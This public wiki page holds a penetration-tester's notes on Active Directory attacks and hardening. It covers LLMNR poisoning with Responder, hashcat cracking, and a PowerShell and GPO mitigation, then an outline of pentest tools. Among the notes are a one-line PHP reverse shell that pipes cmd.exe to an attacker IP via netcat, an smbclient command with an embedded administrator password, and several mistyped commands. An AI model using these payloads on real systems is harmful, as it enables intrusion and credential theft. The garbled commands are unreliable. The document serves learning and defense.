home
Please note
Important
This is a public wiki.
Note
Useful information that users should know, even when skimming content.
Tip
Helpful advice for doing things better or more easily.
Important
Key information users need to know to achieve their goal.
Warning
Urgent info that needs immediate user attention to avoid problems.
Caution
Advises about risks or negative outcomes of certain actions.
Note
This Wiki covers a range of technical topics
Penetration Testing Windows Active Directory PowerShell
Code is available from the code repo https://github.com/asktechsupport/help
Step1️⃣ Run Responder
python /usr/share/responder/Responder.py -I tun0 -rdw -v
sudo -I responder -| tun0 -dwP
Step 2️⃣
Step 3️⃣A hash will come through, like the screenshot:
Step 4️⃣ Using hashcat, if the password is weak enough we can crack it:
hashcat -m 5600 hashes.txt rockyou.txt
To mitigate the LLMNR (Link-Local Multicast Name Resolution) poisoning vulnerability in an Active Directory environment, you can use PowerShell to disable LLMNR across your network. Here's how:
Steps to Mitigate LLMNR Poisoning
-
Check the current status of LLMNR
Use the following PowerShell command to verify whether LLMNR is enabled:Get-NetAdapterBinding -ComponentID ms_lltdio
If LLMNR is active, proceed to disable it.
-
Disable LLMNR via Group Policy
To effectively manage this setting across the network, it is recommended to apply it via Group Policy.Use PowerShell to configure the necessary registry settings to disable LLMNR:
# Set LLMNR to disabled in the registry Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" -Name "EnableMulticast" -Value 0
If the
EnableMulticastkey doesn't exist, create it:New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" -Name "EnableMulticast" -PropertyType DWord -Value 0
-
Confirm the setting
Verify that LLMNR is disabled:Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" -Name "EnableMulticast"
-
Deploy via Group Policy (Optional for multiple machines)
- Open the Group Policy Management Console (GPMC).
- Navigate to
Computer Configuration > Administrative Templates > Network > DNS Client. - Enable the setting "Turn off multicast name resolution".
Alternatively, use PowerShell to deploy a Group Policy Object (GPO) across your domain:
[!NOTE] Add the link to the powershell document.
# Create a new GPO
New-GPO -Name "Disable LLMNR"
# Configure the GPO to disable LLMNR
Set-GPRegistryValue -Name "Disable LLMNR" -Key "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient" -ValueName "EnableMulticast" -Type DWord -Value 0
# Link GPO to a specific Organizational Unit (OU)
New-GPLink -Name "Disable LLMNR" -Target <e.g.>"OU=<<<Computers>>>,DC=<<<YourDomain>>>,DC=co,DC=uk"-
Test and Validate
After applying the changes, test to ensure that LLMNR is disabled and that no LLMNR traffic is observed. You can use a network monitoring tool like Wireshark to confirm that LLMNR queries (port 5355) are no longer broadcasted.Deploy via Group Policy (Optional for multiple machines)
- Open the Group Policy Management Console (GPMC).
- Navigate to
Computer Configuration > Administrative Templates > Network > DNS Client. - Enable the setting "Turn off multicast name resolution".
By disabling LLMNR, you effectively reduce the risk of exploitation via LLMNR poisoning attacks in your Active Directory environment.
Tip
If a company must use or cannot disable LLMNR, the best course of action is to:
1️⃣Require Network Access Control
2️⃣Require Strong user passwords (greater than 14 characters)
Note
ldapdomaindump
Bloodhound
Plumhound
PingCastle
- Overview of Penetration Testing
- Definition and Goals
- Types of Penetration Tests (Black Box, White Box, Gray Box)
- Legal and Ethical Considerations
- Laws and Compliance (e.g., GDPR, HIPAA, PCI-DSS)
- Rules of Engagement (ROE)
- Obtaining Permission (Authorization)
- Planning and Pre-Engagement
- Scoping and Requirements
- Threat Modeling
- Attack Surface Analysis
- Reconnaissance
- Passive Reconnaissance
- Active Reconnaissance
- OSINT Tools and Techniques
- Scanning and Enumeration
- Network Mapping
- Service Enumeration
- Vulnerability Scanning
- Exploitation
- Gaining Access
- Privilege Escalation
- Tools for Exploitation
- Post-Exploitation
- Persistence
- Lateral Movement
- Data Exfiltration
- Reporting
- Writing a Professional Report
- Mitigation Recommendations
- OSINT Tools
- Maltego
- theHarvester
- SpiderFoot
- Shodan
- Subdomain Enumeration
- Amass
- Sublist3r
- Google Dorking
- Advanced Search Operators
- WHOIS and DNS Recon
- dnsenum
- DNSRecon
whoami /priv
- Network Scanning
- Nmap
- Masscan
- Web Application Scanning
- Nikto
- Burp Suite
- Service Enumeration
- smbclient
- enum4linux
- rpcclient
Note
To query Windows Defender, use:
sc query windefend
Note
To find out what AV is running, use:
sc queryex type= service
Note
To query the firewalls, use
netsh advfirewall firewall dump
netsh firewall show state
netsh firewall show config
- Exploitation Frameworks
- Metasploit
- Cobalt Strike
- Core Impact
- Vulnerability-Specific Exploits
- SQLmap (SQL Injection)
- Hydra (Brute Forcing)
- Aircrack-ng (Wi-Fi Hacking)
- Scripting Exploits
- Python and Bash Exploits
- Custom Scripts for Exploitation
- Privilege Escalation
- Windows Tools: WinPEAS, Mimikatz, PowerUp
- Linux Tools: LinPEAS, GTFOBins
- Persistence Mechanisms
- Scheduled Tasks
- Startup Scripts
- Lateral Movement
- PsExec
- BloodHound
- Data Exfiltration
- Netcat
- Exfiltration Over DNS
- OWASP Top 10
- Common Web Vulnerabilities
- SQL Injection
- Cross-Site Scripting (XSS)
- Cross-Site Request Forgery (CSRF)
- Insecure Deserialization
- Web Security Tools
- Burp Suite
- OWASP ZAP
- Wappalyzer
- Wireless Attacks
- WPA/WPA2 Cracking
- Evil Twin Attacks
- Wireless Tools
- Aircrack-ng Suite
- Wireshark
- Bettercap
- Techniques
- Phishing
- Vishing
- Pretexting
- Tools
- Gophish
- SET (Social Engineering Toolkit)
- Reporting Structure
- Executive Summary
- Technical Details
- Proof of Concepts
- Risk Ratings
- CVSS (Common Vulnerability Scoring System)
- Mitigation Strategies
- Best Practices for Hardening
- Windows Subsystem for Linux (WSL)
- PayloadsAllTheThings
- Chatterbox
- SecNotes
- Reconnaissance Tools
- theHarvester, Shodan, SpiderFoot
- Scanning Tools
- Nmap, Nikto, Masscan
- Exploitation Tools
- Metasploit, SQLmap, Hydra
- Post-Exploitation Tools
- Mimikatz, LinPEAS, BloodHound
- Reporting Tools
- Dradis Framework
smbclient -U 'administrator%u6!4zwgwOM#^0Bf#Nwhn' \\\\127..0.1\\c$
This is a basic reverse shell written in php
<?php
system('nc.exe -e cmd.exe $yourip 4444')
?>
- psexpec.py
- smbexec.py
- wmiexec.py
Spawning a TTY Shell - https://netsec.ws/?p=337
https://github.com/SecureAuthCorp/impacket.git
cd /opt/
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket-0.9.19/
pip3 install.
Note
The version number may change under the git clone line
Nmap
arp-scan
SYN SYNACK ACK nmap Stealth scanning SYN SYNACK ACK nmap -sS SYN SYNACK RST nmap -sS
nmap -T4 -P- -A
https://blog.reknowledge.tech/blog/osnt-analyst-replaced-by-automation
PLANNING & DIRECTION >> COLLECTION >> PROCESSING AND EXPLOITATION >> ANALYSIS AND PRODUCTION >> DISSEMINATON AND INTEGRATION
- Google, lmgtfy,
- site:
- site:tesla.com -www
- filetype:csv
- hunter.io
- Phonebook.cz
- Clearbit
- email-checker.net
- emailhippo.com
- hashes.org
-
sublist3r
-
owasp amass
-
wappalyzer (Firefox)
-
burpsuite https://burp - Kali
hmaverickadams | breach-parse | github.com
- Recommended Courses
- TCM Academy (PNPT, OSINT, Practical Ethical Hacking)
- Practice Labs
- TryHackMe
- Hack The Box
- VulnHub
- Books
- "The Hacker Playbook"
- "Red Team Field Manual"
- "Metasploit: The Penetration Tester’s Guide"
- https://github.com/swisskyrepo/PayloadsAllTheThings
Links to further reading and tools.
Answers to commonly asked questions.
How to configure and manage Group Policies.
Hosts file
c:\Windows\System32\Drivers\etc\hosts
Key concepts and architecture of Active Directory.
Guide to resolving frequently encountered problems.
Best practices for managing users and groups.
Securing your environment and managing permissions.
Preparing for and recovering from disasters.
Key functions of AD CS
- Integration with Active Directory: AD CS integrates with Microsoft’s PKI implementation within Active Directory to facilitate the issuance of certificates for X.509-formatted documents, encryption, message signing, and authentication.
- Certificate Authority (CA): Certificates are issued by Certificate Authority (CA). CAs bind an identity to a public/private key pair, which is then utilized by applications to verify user identity.
- Private/Public Key Generation: The client generates a private key pair. The public key is included in a Certificate Signing Request (CSR) along with details like subject and template name.
- Certificate Signing Request (CSR): The CSR, which includes the public key and other details necessary for certificate generation, is sent to the Enterprise CA server. Verification by CA Server: The Enterprise CA server verifies the client’s permissions and template settings. It ensures the client is permitted to request the certificate based on the provided template settings.
- Certificate Generation: If the client’s request is permitted, the CA generates a certificate based on the template settings. The certificate is signed with the CA’s private key.
- Certificate Issuance: The signed certificate is returned to the client, who can now use the certificate for secure communications, authentication, and other cryptographic operations.
- object identifiers (OIDs) PKI Solutions provides a comprehensive list of the EKU OIDs offered by Microsoft.
- ESC1 attacks: and Read on ESC1 attacks and Certipy: certipy tool
AD Components
-
Domain Controllers
-
AD DS Data Store
-
NTDS.dit
-
Forests Trees, Trusts,
-
Trusts: Directional, Transitive
-
Organisational Units (OUs)
-
Schema
-
Class Objects
-
Attribute Objects
User Objects: enable network resource access for a user
InetOrgPerson: Simlar to a user account, used for compatibility with other directory services
Contacts: Used primarily to assign e-mail addresses to external users, Does not enable network access
Groups: Used to simplify the administration of access control
Computers: Enables auth and auditing of computer access to resources
Printers: Used to simplify the process of locating an connecting to printers
Shared folders: Enables users to search for shared folders based on properties
Certificates: A certificate on a server is like an ID card for a website. It shows that the website is legitimate and helps ensure that your information is safe when you visit it.
When you go to a website, this certificate lets your browser know that it’s talking to the real site and not an imposter. It also helps to encrypt any data you share, like passwords or credit card numbers, so that only the website can read it. In short, it’s a way to build trust and keep your online activities secure.
